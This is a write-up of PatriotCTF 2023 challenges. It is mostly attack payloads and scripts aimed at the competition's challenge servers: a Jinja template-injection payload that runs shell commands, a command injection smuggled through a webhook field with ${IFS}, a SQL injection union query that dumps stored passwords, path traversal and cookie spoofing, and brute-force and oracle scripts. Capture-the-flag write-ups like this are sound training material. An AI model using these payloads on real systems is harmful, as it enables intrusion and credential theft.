PatriotCTF 2023-Writeup

Web

Pick Your Starter

1
2
// filter ' " [ bullutin
http://chal.pctf.competitivecyber.club:5555/{{cycler.__init__.__globals__.os.popen(request.args.l).read()}}?a=-config&l=ls%20/

Checkmate

Use the script provided below to generate a list of legitimate passwords. These passwords can then be used in a brute force attack to ultimately retrieve the FLAG.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

// charsets
const chars = "abcdefghijklmnopqrstuvwxyz";

//
function isValidPasswordCombo(arr) {
var add = arr[0].charCodeAt(0) & arr[2].charCodeAt(0);
var or = arr[1].charCodeAt(0) | arr[4].charCodeAt(0);
var xor = arr[3].charCodeAt(0) ^ arr[5].charCodeAt(0);
return (add === 0x60) && (or === 0x61) && (xor === 0x6);
}

// Check whether the sum of passwords is 0xbb
function isSumValid(pwd) {
let sum = 0;
for (let i = 0; i < pwd.length; i += 6) {
const segment = pwd.slice(i, i + 6);
var add = segment[0].charCodeAt(0) & segment[2].charCodeAt(0);
var or = segment[1].charCodeAt(0) | segment[4].charCodeAt(0);
var xor = segment[3].charCodeAt(0) ^ segment[5].charCodeAt(0);
sum += add + or - xor;
}
return sum === 0xbb;
}

// dig out passwords
for (let i = 0; i < chars.length; i++) {
for (let j = 0; j < chars.length; j++) {
for (let k = 0; k < chars.length; k++) {
for (let l = 0; l < chars.length; l++) {
for (let m = 0; m < chars.length; m++) {
for (let n = 0; n < chars.length; n++) {
const arr = [chars[i], chars[j], chars[k], chars[l], chars[m], chars[n]];
if (isValidPasswordCombo(arr)) {
const pwd = arr.join('');
if (isSumValid(pwd)) {
console.log(pwd);

}
}
}
}
}
}
}
1
2
3
POST http://chal.pctf.competitivecyber.club:9096/check.php

password=sadsau

Flower shop

1
2
3
4
5
6
7
8
9
# Step 1
POST /modules/signup.inc.php HTTP/1.1

uid=2h0ng71&pwd=admin&wh=<@urlencode_all>https://webhook.site/60e2905c-53fd-4229-b367-9cd730ed628a;bash${IFS}-c${IFS}"cat<../admin.php>/var/www/html/123aaaazzzz.txt";<@/urlencode_all>&submit=

# Step 2
POST /modules/reset.inc.php HTTP/1.1

uid=2h0ng71&token=1c7fbe4fd0281e0f32d78c8507a6a84b&submit=

One-for-All

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Flag 1:
GET / HTTP/1.1
Host: chal.pctf.competitivecyber.club:9090
Cookie: name=admin

Flag 2:
/user?id=0

Flag 3:
POST /

username= 1" union select 1,2,3, (SELECT GROUP_CONCAT(password) from accounts);--

Flag 4:
GET /secretsforyou/..;/ HTTP/1.1

OSINT

Rouge Access Point

https://www.osintcurio.us/2019/01/15/tracking-all-the-wifi-things/

https://wigle.net/

https://wigle.net/search#detailSearch

Karter

First step → Leveraging Google dork to get the name of the director and its PIN:

1
allintext: "flipkart" "2021" "director" & before:2022-01-01 after:2020-12-01

Second step → find DIN at:

1
2
https://www.tofler.in/flipkart-internet-private-limited/company/U51109KA2012PTC066107/directors
https://www.tofler.in/jonathan-marshall-collins/director/09075331

Third step → Ask chatgpt how to get director information from official website in India:

1
2
3
4

Enquiry: I want to obtain information about the Director Identification Number from the government website in India. Where can I find it?

Answer: https://www.mca.gov.in/mcafoportal/enquireDIN.do

Misc

Flag Finder

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *
import time

context.log_level = 'error'

def guess_password():
charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
base_password = ['0'] * 13
print(f"[+] Base password: {''.join(base_password)}")

count = 5
for i in range(0, 13):
print(f'[+] Guessing character: {i}')

best_char = '0'
for char in charset:
base_password[i] = char
password_guess = 'pctf{' + ''.join(base_password) + '}'

print(f"[+] Trying password: {password_guess}")

correct_len = test(password_guess)
if correct_len > count:
count += 1
print(f"[+] Found character: {base_password}")
break

return ''.join(base_password)

def test(password):
sh = remote('chal.pctf.competitivecyber.club', 4757)
sh.recvuntil('What is the password: ')
start_time = time.time()
sh.sendline(password)
res = sh.recvuntil(b'There\'s been an error')

correct_len = (len(res.split(b'\n'))-1)/2
print(correct_len)

duration = time.time() - start_time

sh.close()

return correct_len

password = guess_password()
print(f"Final password: {password}")